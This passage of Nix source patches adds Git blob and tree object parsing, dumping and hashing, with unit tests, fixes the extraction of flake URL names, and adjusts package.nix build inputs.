+        unsigned long long size = std::stoi(getStringUntil(source, 0));
+
+        crf.preallocateContents(size);
+
+        unsigned long long left = size;
+        std::string buf;
+        buf.reserve(65536);
+
+        while (left) {
+            checkInterrupt();
+            buf.resize(std::min((unsigned long long)buf.capacity(), left));
+            source(buf);
+            crf(buf);
+            left -= buf.size();
+        }
+    });
+}
+
+void parseTree(
+    FileSystemObjectSink & sink,
+    const Path & sinkPath,
+    Source & source,
+    std::function<SinkHook> hook,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    unsigned long long size = std::stoi(getStringUntil(source, 0));
+    unsigned long long left = size;
+
+    sink.createDirectory(sinkPath);
+
+    while (left) {
+        std::string perms = getStringUntil(source, ' ');
+        left -= perms.size();
+        left -= 1;
+
+        RawMode rawMode = std::stoi(perms, 0, 8);
+        auto modeOpt = decodeMode(rawMode);
+        if (!modeOpt)
+            throw Error("Unknown Git permission: %o", perms);
+        auto mode = std::move(*modeOpt);
+
+        std::string name = getStringUntil(source, '\0');
+        left -= name.size();
+        left -= 1;
+
+        std::string hashs = getString(source, 20);
+        left -= 20;
+
+        Hash hash(HashAlgorithm::SHA1);
+        std::copy(hashs.begin(), hashs.end(), hash.hash);
+
+        hook(name, TreeEntry {
+            .mode = mode,
+            .hash = hash,
+        });
+    }
+}
+
+ObjectType parseObjectType(
+    Source & source,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    auto type = getString(source, 5);
+
+    if (type == "blob ") {
+        return ObjectType::Blob;
+    } else if (type == "tree ") {
+        return ObjectType::Tree;
+    } else throw Error("input doesn't look like a Git object");
+}
+
+void parse(
+    FileSystemObjectSink & sink,
+    const Path & sinkPath,
+    Source & source,
+    bool executable,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    auto type = parseObjectType(source, xpSettings);
+
+    switch (type) {
+    case ObjectType::Blob:
+        parseBlob(sink, sinkPath, source, executable, xpSettings);
+        break;
+    case ObjectType::Tree:
+        parseTree(sink, sinkPath, source, hook, xpSettings);
+        break;
+    default:
+        assert(false);
+    };
+}
+
+
+std::optional convertMode(SourceAccessor::Type type)
+{
+    switch (type) {
+    case SourceAccessor::tSymlink:   return Mode::Symlink;
+    case SourceAccessor::tRegular:   return Mode::Regular;
+    case SourceAccessor::tDirectory: return Mode::Directory;
+    case SourceAccessor::tMisc:      return std::nullopt;
+    default: abort();
+    }
+}
+
+
+void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
+{
+    parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
+        auto [accessor, from] = hook(entry.hash);
+        auto stat = accessor->lstat(from);
+        auto gotOpt = convertMode(stat.type);
+        if (!gotOpt)
+            throw Error("file '%s' (git hash %s) has an unsupported type",
+                from,
+                entry.hash.to_string(HashFormat::Base16, false));
+        auto & got = *gotOpt;
+        if (got != entry.mode)
+            throw Error("git mode of file '%s' (git hash %s) is %o but expected %o",
+                from,
+                entry.hash.to_string(HashFormat::Base16, false),
+                (RawMode) got,
+                (RawMode) entry.mode);
+        copyRecursive(
+            *accessor, from,
+            sink, name);
+    });
+}
+
+
+void dumpBlobPrefix(
+    uint64_t size, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+    auto s = fmt("blob %d\0"s, std::to_string(size));
+    sink(s);
+}
+
+
+void dumpTree(const Tree & entries, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    std::string v1;
+
+    for (auto & [name, entry] : entries) {
+        auto name2 = name;
+        if (entry.mode == Mode::Directory) {
+            assert(name2.back() == '/');
+            name2.pop_back();
+        }
+        v1 += fmt("%o %s\0"s, static_cast(entry.mode), name2);
+        std::copy(entry.hash.hash, entry.hash.hash + entry.hash.hashSize, std::back_inserter(v1));
+    }
+
+    {
+        auto s = fmt("tree %d\0"s, v1.size());
+        sink(s);
+    }
+
+    sink(v1);
+}
+
+
+Mode dump(
+    SourceAccessor & accessor, const CanonPath & path,
+    Sink & sink,
+    std::function hook,
+    PathFilter & filter,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    auto st = accessor.lstat(path);
+
+    switch (st.type) {
+    case SourceAccessor::tRegular:
+    {
+        accessor.readFile(path, sink, [&](uint64_t size) {
+            dumpBlobPrefix(size, sink, xpSettings);
+        });
+        return st.isExecutable
+            ? Mode::Executable
+            : Mode::Regular;
+    }
+
+    case SourceAccessor::tDirectory:
+    {
+        Tree entries;
+        for (auto & [name, _] : accessor.readDirectory(path)) {
+            auto child = path / name;
+            if (!filter(child.abs())) continue;
+
+            auto entry = hook(child);
+
+            auto name2 = name;
+            if (entry.mode == Mode::Directory)
+                name2 += "/";
+
+            entries.insert_or_assign(std::move(name2), std::move(entry));
+        }
+        dumpTree(entries, sink, xpSettings);
+        return Mode::Directory;
+    }
+
+    case SourceAccessor::tSymlink:
+    case SourceAccessor::tMisc:
+    default:
+        throw Error("file '%1%' has an unsupported type", path);
+    }
+}
+
+
+TreeEntry dumpHash(
+        HashAlgorithm ha,
+        SourceAccessor & accessor, const CanonPath & path, PathFilter & filter)
+{
+    std::function hook;
+    hook = [&](const CanonPath & path) -> TreeEntry {
+        auto hashSink = HashSink(ha);
+        auto mode = dump(accessor, path, hashSink, hook, filter);
+        auto hash = hashSink.finish().first;
+        return {
+            .mode = mode,
+            .hash = hash,
+        };
+    };
+
+    return hook(path);
+}
+
+
 std::optional parseLsRemoteLine(std::string_view line)
 {
     const static std::regex line_regex("^(ref: *)?([^\\s]+)(?:\\t+(.*))?$");
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index dea351929..d9eb138e1 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -5,8 +5,160 @@
 #include 
 #include 
 
+#include "types.hh"
+#include "serialise.hh"
+#include "hash.hh"
+#include "source-accessor.hh"
+#include "fs-sink.hh"
+
 namespace nix::git {
 
+enum struct ObjectType {
+    Blob,
+    Tree,
+    //Commit,
+    //Tag,
+};
+
+using RawMode = uint32_t;
+
+enum struct Mode : RawMode {
+    Directory = 0040000,
+    Regular = 0100644,
+    Executable = 0100755,
+    Symlink = 0120000,
+};
+
+std::optional decodeMode(RawMode m);
+
+/**
+ * An anonymous Git tree object entry (no name part).
+ */
+struct TreeEntry
+{
+    Mode mode;
+    Hash hash;
+
+    GENERATE_CMP(TreeEntry, me->mode, me->hash);
+};
+
+/**
+ * A Git tree object, fully decoded and stored in memory.
+ *
+ * Directory names must end in a `/` for the sake of sorting. See
+ * https://github.com/mirage/irmin/issues/352
+ */
+using Tree = std::map;
+
+/**
+ * Callback for processing a child hash with `parse`
+ *
+ * The function should
+ *
+ * 1. Obtain the file system objects denoted by `gitHash`
+ *
+ * 2. Ensure they match `mode`
+ *
+ * 3. Feed them into the same sink `parse` was called with
+ *
+ * Implementations may seek to memoize resources (bandwidth, storage,
+ * etc.) for the same Git hash.
+ */
+using SinkHook = void(const Path & name, TreeEntry entry);
+
+/**
+ * Parse the "blob " or "tree " prefix.
+ *
+ * @throws if prefix not recognized
+ */
+ObjectType parseObjectType(
+    Source & source,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+void parseBlob(
+    FileSystemObjectSink & sink, const Path & sinkPath,
+    Source & source,
+    bool executable,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+void parseTree(
+    FileSystemObjectSink & sink, const Path & sinkPath,
+    Source & source,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Helper putting the previous three `parse*` functions together.
+ */
+void parse(
+    FileSystemObjectSink & sink, const Path & sinkPath,
+    Source & source,
+    bool executable,
+    std::function hook,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Assists with writing a `SinkHook` step (2).
+ */
+std::optional convertMode(SourceAccessor::Type type);
+
+/**
+ * Simplified version of `SinkHook` for `restore`.
+ *
+ * Given a `Hash`, return a `SourceAccessor` and `CanonPath` pointing to
+ * the file system object with that path.
+ */
+using RestoreHook = std::pair(Hash);
+
+/**
+ * Wrapper around `parse` and `RestoreSink`
+ */
+void restore(FileSystemObjectSink & sink, Source & source, std::function hook);
+
+/**
+ * Dumps a single file to a sink
+ *
+ * @param xpSettings for testing purposes
+ */
+void dumpBlobPrefix(
+    uint64_t size, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Dumps a representation of a git tree to a sink
+ */
+void dumpTree(
+    const Tree & entries, Sink & sink,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Callback for processing a child with `dump`
+ *
+ * The function should return the Git hash and mode of the file at the
+ * given path in the accessor passed to `dump`.
+ *
+ * Note that if the child is a directory, its children must also be so
+ * processed in order to compute this information.
+ */
+using DumpHook = TreeEntry(const CanonPath & path);
+
+Mode dump(
+    SourceAccessor & accessor, const CanonPath & path,
+    Sink & sink,
+    std::function hook,
+    PathFilter & filter = defaultPathFilter,
+    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
+
+/**
+ * Recursively dumps path, hashing as we go.
+ *
+ * A smaller wrapper around `dump`.
+ */
+TreeEntry dumpHash(
+            HashAlgorithm ha,
+            SourceAccessor & accessor, const CanonPath & path,
+            PathFilter & filter = defaultPathFilter);
+
 /**
  * A line from the output of `git ls-remote --symref`.
  *
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 73bbd049e..76ef86bcf 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -9,6 +9,211 @@ namespace nix {
 
 using namespace git;
 
+class GitTest : public CharacterizationTest
+{
+    Path unitTestData = getUnitTestData() + "/git";
+
+public:
+
+    Path goldenMaster(std::string_view testStem) const override {
+        return unitTestData + "/" + testStem;
+    }
+
+    /**
+     * We set these in tests rather than the regular globals so we don't have
+     * to worry about race conditions if the tests run concurrently.
+     */
+    ExperimentalFeatureSettings mockXpSettings;
+
+private:
+
+    void SetUp() override
+    {
+        mockXpSettings.set("experimental-features", "git-hashing");
+    }
+};
+
+TEST(GitMode, gitMode_directory) {
+    Mode m = Mode::Directory;
+    RawMode r = 0040000;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST(GitMode, gitMode_executable) {
+    Mode m = Mode::Executable;
+    RawMode r = 0100755;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST(GitMode, gitMode_regular) {
+    Mode m = Mode::Regular;
+    RawMode r = 0100644;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST(GitMode, gitMode_symlink) {
+    Mode m = Mode::Symlink;
+    RawMode r = 0120000;
+    ASSERT_EQ(static_cast(m), r);
+    ASSERT_EQ(decodeMode(r), std::optional { m });
+};
+
+TEST_F(GitTest, blob_read) {
+    readTest("hello-world-blob.bin", [&](const auto & encoded) {
+        StringSource in { encoded };
+        StringSink out;
+        RegularFileSink out2 { out };
+        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
+        parseBlob(out2, "", in, false, mockXpSettings);
+
+        auto expected = readFile(goldenMaster("hello-world.bin"));
+
+        ASSERT_EQ(out.s, expected);
+    });
+}
+
+TEST_F(GitTest, blob_write) {
+    writeTest("hello-world-blob.bin", [&]() {
+        auto decoded = readFile(goldenMaster("hello-world.bin"));
+        StringSink s;
+        dumpBlobPrefix(decoded.size(), s, mockXpSettings);
+        s(decoded);
+        return s.s;
+    });
+}
+
+/**
+ * This data is for "shallow" tree tests. However, we use "real" hashes
+ * so that we can check our test data in a small shell script test
+ * (`tests/unit/libutil/data/git/check-data.sh`).
+ */
+const static Tree tree = {
+    {
+        "Foo",
+        {
+            .mode = Mode::Regular,
+            // hello world with special chars from above
+            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+        },
+    },
+    {
+        "bAr",
+        {
+            .mode = Mode::Executable,
+            // ditto
+            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+        },
+    },
+    {
+        "baZ/",
+        {
+            .mode = Mode::Directory,
+            // Empty directory hash
+            .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
+        },
+    },
+};
+
+TEST_F(GitTest, tree_read) {
+    readTest("tree.bin", [&](const auto & encoded) {
+        StringSource in { encoded };
+        NullFileSystemObjectSink out;
+        Tree got;
+        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Tree);
+        parseTree(out, "", in, [&](auto & name, auto entry) {
+            auto name2 = name;
+            if (entry.mode == Mode::Directory)
+                name2 += '/';
+            got.insert_or_assign(name2, std::move(entry));
+        }, mockXpSettings);
+
+        ASSERT_EQ(got, tree);
+    });
+}
+
+TEST_F(GitTest, tree_write) {
+    writeTest("tree.bin", [&]() {
+        StringSink s;
+        dumpTree(tree, s, mockXpSettings);
+        return s.s;
+    });
+}
+
+TEST_F(GitTest, both_roundrip) {
+    using File = MemorySourceAccessor::File;
+
+    MemorySourceAccessor files;
+    files.root = File::Directory {
+        .contents {
+            {
+                "foo",
+                File::Regular {
+                    .contents = "hello\n\0\n\tworld!",
+                },
+            },
+            {
+                "bar",
+                File::Directory {
+                    .contents = {
+                        {
+                            "baz",
+                            File::Regular {
+                                .executable = true,
+                                .contents = "good day,\n\0\n\tworld!",
+                            },
+                        },
+                    },
+                },
+            },
+        },
+    };
+
+    std::map cas;
+
+    std::function dumpHook;
+    dumpHook = [&](const CanonPath & path) {
+        StringSink s;
+        HashSink hashSink { HashAlgorithm::SHA1 };
+        TeeSink s2 { s, hashSink };
+        auto mode = dump(
+            files, path, s2, dumpHook,
+            defaultPathFilter, mockXpSettings);
+        auto hash = hashSink.finish().first;
+        cas.insert_or_assign(hash, std::move(s.s));
+        return TreeEntry {
+            .mode = mode,
+            .hash = hash,
+        };
+    };
+
+    auto root = dumpHook(CanonPath::root);
+
+    MemorySourceAccessor files2;
+
+    MemorySink sinkFiles2 { files2 };
+
+    std::function mkSinkHook;
+    mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
+        StringSource in { cas[hash] };
+        parse(
+            sinkFiles2, prefix, in, executable,
+            [&](const Path & name, const auto & entry) {
+                mkSinkHook(
+                    prefix + "/" + name,
+                    entry.hash,
+                    entry.mode == Mode::Executable);
+            },
+            mockXpSettings);
+    };
+
+    mkSinkHook("", root.hash, false);
+
+    ASSERT_EQ(files, files2);
+}
+
 TEST(GitLsRemote, parseSymrefLineWithReference) {
     auto line = "ref: refs/head/main	HEAD";
     auto res = parseLsRemoteLine(line);

From e5d9130a5bb1ee3f2926afff17be4c031ca404a0 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Mon, 26 Feb 2024 21:45:41 +0100
Subject: [PATCH 522/654] Fix extraction of name for defaultPackage URLs

---
 src/libexpr/flake/url-name.cc        | 14 ++++++--------
 tests/unit/libexpr/flake/url-name.cc |  1 +
 2 files changed, 7 insertions(+), 8 deletions(-)

diff --git a/src/libexpr/flake/url-name.cc b/src/libexpr/flake/url-name.cc
index 753f197d5..d62b34552 100644
--- a/src/libexpr/flake/url-name.cc
+++ b/src/libexpr/flake/url-name.cc
@@ -5,13 +5,12 @@
 namespace nix {
 
 static const std::string attributeNamePattern("[a-zA-Z0-9_-]+");
-static const std::regex lastAttributeRegex("(?:" + attributeNamePattern + "\\.)*(?!default)(" + attributeNamePattern +")(\\^.*)?");
+static const std::regex lastAttributeRegex("^((?:" + attributeNamePattern + "\\.)*)(" + attributeNamePattern +")(\\^.*)?$");
 static const std::string pathSegmentPattern("[a-zA-Z0-9_-]+");
 static const std::regex lastPathSegmentRegex(".*/(" + pathSegmentPattern +")");
 static const std::regex secondPathSegmentRegex("(?:" + pathSegmentPattern + ")/(" + pathSegmentPattern +")(?:/.*)?");
 static const std::regex gitProviderRegex("github|gitlab|sourcehut");
 static const std::regex gitSchemeRegex("git($|\\+.*)");
-static const std::regex defaultOutputRegex(".*\\.default($|\\^.*)");
 
 std::optional getNameFromURL(const ParsedURL & url)
 {
@@ -22,8 +21,11 @@ std::optional getNameFromURL(const ParsedURL & url)
         return url.query.at("dir");
 
     /* If the fragment isn't a "default" and contains two attribute elements, use the last one */
-    if (std::regex_match(url.fragment, match, lastAttributeRegex))
-        return match.str(1);
+    if (std::regex_match(url.fragment, match, lastAttributeRegex)
+        && match.str(1) != "defaultPackage."
+        && match.str(2) != "default") {
+        return match.str(2);
+    }
 
     /* If this is a github/gitlab/sourcehut flake, use the repo name */
     if (std::regex_match(url.scheme, gitProviderRegex) && std::regex_match(url.path, match, secondPathSegmentRegex))
@@ -33,10 +35,6 @@ std::optional getNameFromURL(const ParsedURL & url)
     if (std::regex_match(url.scheme, gitSchemeRegex) && std::regex_match(url.path, match, lastPathSegmentRegex))
         return match.str(1);
 
-    /* If everything failed but there is a non-default fragment, use it in full */
-    if (!url.fragment.empty() && !std::regex_match(url.fragment, defaultOutputRegex))
-        return url.fragment;
-
     /* If there is no fragment, take the last element of the path */
     if (std::regex_match(url.path, match, lastPathSegmentRegex))
         return match.str(1);
diff --git a/tests/unit/libexpr/flake/url-name.cc b/tests/unit/libexpr/flake/url-name.cc
index 85387b323..15bc6b111 100644
--- a/tests/unit/libexpr/flake/url-name.cc
+++ b/tests/unit/libexpr/flake/url-name.cc
@@ -14,6 +14,7 @@ namespace nix {
         ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "mylaptop");
         ASSERT_EQ(getNameFromURL(parseURL("path:./nixpkgs#packages.x86_64-linux.complex^bin,man")), "complex");
         ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#packages.x86_64-linux.default^*")), "myproj");
+        ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#defaultPackage.x86_64-linux")), "myproj");
 
         ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello");
         ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#hello")), "hello");

From 04836c73e5589ec10bef08992a7ef815a7f7592c Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sun, 21 Jan 2024 14:01:57 -0500
Subject: [PATCH 523/654] Merge `nativeCheckInputs` into `nativeBuildInputs`

They were getting skipped for the test-against checks.
---
 package.nix | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/package.nix b/package.nix
index d1d14d10e..1f895e301 100644
--- a/package.nix
+++ b/package.nix
@@ -209,6 +209,10 @@ in {
     (lib.getBin lowdown)
     mdbook
     mdbook-linkcheck
+  ] ++ lib.optionals doInstallCheck [
+    git
+    mercurial
+    openssh
   ] ++ lib.optionals (doInstallCheck || enableManual) [
     jq # Also for custom mdBook preprocessor.
   ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux
@@ -249,12 +253,6 @@ in {
   dontBuild = !attrs.doBuild;
   doCheck = attrs.doCheck;
 
-  nativeCheckInputs = [
-    git
-    mercurial
-    openssh
-  ];
-
   disallowedReferences = [ boost ];
 
   preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) (

From 201551c937c3f816a23c4c2f36edba60619e42f9 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 4 Sep 2023 09:51:23 -0400
Subject: [PATCH 524/654] Add Git object hashing to the store layer

Part of RFC 133

Extracted from our old IPFS branches.

Co-Authored-By: Matthew Bauer 
Co-Authored-By: Carlo Nucera 
Co-authored-by: Robert Hensing 
Co-authored-by: Florian Klink 
---
 Makefile                                    |   1 +
 doc/manual/src/protocols/store-path.md      |   9 +-
 perl/lib/Nix/Store.xs                       |   2 +-
 src/libexpr/primops.cc                      |   5 +-
 src/libstore/binary-cache-store.cc          |   7 +-
 src/libstore/binary-cache-store.hh          |   2 +-
 src/libstore/build/local-derivation-goal.cc |  34 ++++--
 src/libstore/build/worker.cc                |   4 +-
 src/libstore/content-address.cc             |  11 ++
 src/libstore/daemon.cc                      |   7 +-
 src/libstore/local-fs-store.hh              |   2 +-
 src/libstore/local-store.cc                 |  85 ++++++++++++---
 src/libstore/optimise-store.cc              |   4 +-
 src/libstore/remote-store.cc                |   1 +
 src/libstore/remote-store.hh                |   2 +-
 src/libstore/store-api.cc                   |  45 +++++++-
 src/libstore/uds-remote-store.hh            |   2 +-
 src/libutil/file-content-address.cc         |  81 +++++++++++---
 src/libutil/file-content-address.hh         | 110 ++++++++++++++++----
 src/nix-store/nix-store.cc                  |   2 +-
 src/nix/add-to-store.cc                     |   1 +
 src/nix/hash.cc                             |  47 +++++++--
 tests/functional/git-hashing/common.sh      |  11 ++
 tests/functional/git-hashing/local.mk       |   7 ++
 tests/functional/git-hashing/simple.sh      |  58 +++++++++++
 tests/unit/libstore/content-address.cc      |   2 +
 tests/unit/libutil/file-content-address.cc  |  28 +++++
 27 files changed, 484 insertions(+), 86 deletions(-)
 create mode 100644 tests/functional/git-hashing/common.sh
 create mode 100644 tests/functional/git-hashing/local.mk
 create mode 100644 tests/functional/git-hashing/simple.sh

diff --git a/Makefile b/Makefile
index f8689c8cf..745e60aa5 100644
--- a/Makefile
+++ b/Makefile
@@ -42,6 +42,7 @@ ifeq ($(ENABLE_FUNCTIONAL_TESTS), yes)
 makefiles += \
   tests/functional/local.mk \
   tests/functional/ca/local.mk \
+  tests/functional/git-hashing/local.mk \
   tests/functional/dyn-drv/local.mk \
   tests/functional/test-libstoreconsumer/local.mk \
   tests/functional/plugins/local.mk
diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index fcf8038fc..565c4fa75 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -89,15 +89,20 @@ where
 
       - `rec` = one of:
 
+        - ```ebnf
+          | ""
+          ```
+          (empty string) for hashes of the flat (single file) serialization
+
         - ```ebnf
           | "r:"
           ```
           hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
         - ```ebnf
-          | ""
+          | "git:"
           ```
-          (empty string) for hashes of the flat (single file) serialization
+          hashes of the [Git blob/tree](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects) [Merkle tree](https://en.wikipedia.org/wiki/Merkle_tree) format
 
       - ```ebnf
         algo = "md5" | "sha1" | "sha256"
diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs
index 4a928594b..1c64cc66b 100644
--- a/perl/lib/Nix/Store.xs
+++ b/perl/lib/Nix/Store.xs
@@ -259,7 +259,7 @@ hashPath(char * algo, int base32, char * path)
             auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path);
             Hash h = hashPath(
                 accessor, canonPath,
-                FileIngestionMethod::Recursive, parseHashAlgo(algo)).first;
+                FileIngestionMethod::Recursive, parseHashAlgo(algo));
             auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false);
             XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0)));
         } catch (Error & e) {
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 850cc7a45..9ea266cf9 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1138,7 +1138,10 @@ drvName, Bindings * attrs, Value & v)
         auto handleHashMode = [&](const std::string_view s) {
             if (s == "recursive") ingestionMethod = FileIngestionMethod::Recursive;
             else if (s == "flat") ingestionMethod = FileIngestionMethod::Flat;
-            else if (s == "text") {
+            else if (s == "git") {
+                experimentalFeatureSettings.require(Xp::GitHashing);
+                ingestionMethod = FileIngestionMethod::Git;
+            } else if (s == "text") {
                 experimentalFeatureSettings.require(Xp::DynamicDerivations);
                 ingestionMethod = TextIngestionMethod {};
             } else
diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc
index 189d1d305..d6047dd7e 100644
--- a/src/libstore/binary-cache-store.cc
+++ b/src/libstore/binary-cache-store.cc
@@ -324,6 +324,7 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             nar = dump2.s;
             break;
         case FileIngestionMethod::Flat:
+        {
             // The dump is Flat, so we need to convert it to NAR with a
             // single file.
             StringSink s;
@@ -331,6 +332,10 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             nar = std::move(s.s);
             break;
         }
+        case FileIngestionMethod::Git:
+            unsupported("addToStoreFromDump");
+            break;
+        }
     } else {
         // Otherwise, we have to do th same hashing as NAR so our single
         // hash will suffice for both purposes.
@@ -450,7 +455,7 @@ StorePath BinaryCacheStore::addToStore(
        non-recursive+sha256 so we can just use the default
        implementation of this method in terms of addToStoreFromDump. */
 
-    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first;
+    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter);
 
     auto source = sinkToSource([&](Sink & sink) {
         accessor.dumpPath(path, sink, filter);
diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh
index 00ab73905..76de2d11a 100644
--- a/src/libstore/binary-cache-store.hh
+++ b/src/libstore/binary-cache-store.hh
@@ -147,7 +147,7 @@ public:
 
     void narFromPath(const StorePath & path, Sink & sink) override;
 
-    ref getFSAccessor(bool requireValidPath) override;
+    ref getFSAccessor(bool requireValidPath = true) override;
 
     void addSignatures(const StorePath & storePath, const StringSet & sigs) override;
 
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index b373c74b2..d92966a74 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -8,6 +8,7 @@
 #include "finally.hh"
 #include "util.hh"
 #include "archive.hh"
+#include "git.hh"
 #include "compression.hh"
 #include "daemon.hh"
 #include "topo-sort.hh"
@@ -2457,15 +2458,28 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
             rewriteOutput(outputRewrites);
             /* FIXME optimize and deduplicate with addToStore */
             std::string oldHashPart { scratchPath->hashPart() };
-            auto got = ({
-                HashModuloSink caSink { outputHash.hashAlgo, oldHashPart };
+            auto got = [&]{
                 PosixSourceAccessor accessor;
-                dumpPath(
-                    accessor, CanonPath { actualPath },
-                    caSink,
-                    outputHash.method.getFileIngestionMethod());
-                caSink.finish().first;
-            });
+                auto fim = outputHash.method.getFileIngestionMethod();
+                switch (fim) {
+                case FileIngestionMethod::Flat:
+                case FileIngestionMethod::Recursive:
+                {
+                    HashModuloSink caSink { outputHash.hashAlgo, oldHashPart };
+                    auto fim = outputHash.method.getFileIngestionMethod();
+                    dumpPath(
+                        accessor, CanonPath { actualPath },
+                        caSink,
+                        (FileSerialisationMethod) fim);
+                    return caSink.finish().first;
+                }
+                case FileIngestionMethod::Git: {
+                    return git::dumpHash(
+                        outputHash.hashAlgo, accessor,
+                        CanonPath { tmpDir + "/tmp" }).hash;
+                }
+                }
+            }();
 
             ValidPathInfo newInfo0 {
                 worker.store,
@@ -2491,7 +2505,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                 PosixSourceAccessor accessor;
                 HashResult narHashAndSize = hashPath(
                     accessor, CanonPath { actualPath },
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256);
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256);
                 newInfo0.narHash = narHashAndSize.first;
                 newInfo0.narSize = narHashAndSize.second;
             }
@@ -2515,7 +2529,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                 PosixSourceAccessor accessor;
                 HashResult narHashAndSize = hashPath(
                     accessor, CanonPath { actualPath },
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256);
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256);
                 ValidPathInfo newInfo0 { requiredFinalPath, narHashAndSize.first };
                 newInfo0.narSize = narHashAndSize.second;
                 auto refs = rewriteRefs();
diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc
index 3a34f4006..815ded3d5 100644
--- a/src/libstore/build/worker.cc
+++ b/src/libstore/build/worker.cc
@@ -529,11 +529,11 @@ bool Worker::pathContentsGood(const StorePath & path)
     if (!pathExists(store.printStorePath(path)))
         res = false;
     else {
-        HashResult current = hashPath(
+        Hash current = hashPath(
             *store.getFSAccessor(), CanonPath { store.printStorePath(path) },
             FileIngestionMethod::Recursive, info->narHash.algo);
         Hash nullHash(HashAlgorithm::SHA256);
-        res = info->narHash == nullHash || info->narHash == current.first;
+        res = info->narHash == nullHash || info->narHash == current;
     }
     pathContentsGoodCache.insert_or_assign(path, res);
     if (!res)
diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc
index 4e3d2f64d..4ed4f2de5 100644
--- a/src/libstore/content-address.cc
+++ b/src/libstore/content-address.cc
@@ -11,6 +11,9 @@ std::string_view makeFileIngestionPrefix(FileIngestionMethod m)
         return "";
     case FileIngestionMethod::Recursive:
         return "r:";
+    case FileIngestionMethod::Git:
+        experimentalFeatureSettings.require(Xp::GitHashing);
+        return "git:";
     default:
         throw Error("impossible, caught both cases");
     }
@@ -51,6 +54,10 @@ ContentAddressMethod ContentAddressMethod::parsePrefix(std::string_view & m)
     if (splitPrefix(m, "r:")) {
         return FileIngestionMethod::Recursive;
     }
+    else if (splitPrefix(m, "git:")) {
+        experimentalFeatureSettings.require(Xp::GitHashing);
+        return FileIngestionMethod::Git;
+    }
     else if (splitPrefix(m, "text:")) {
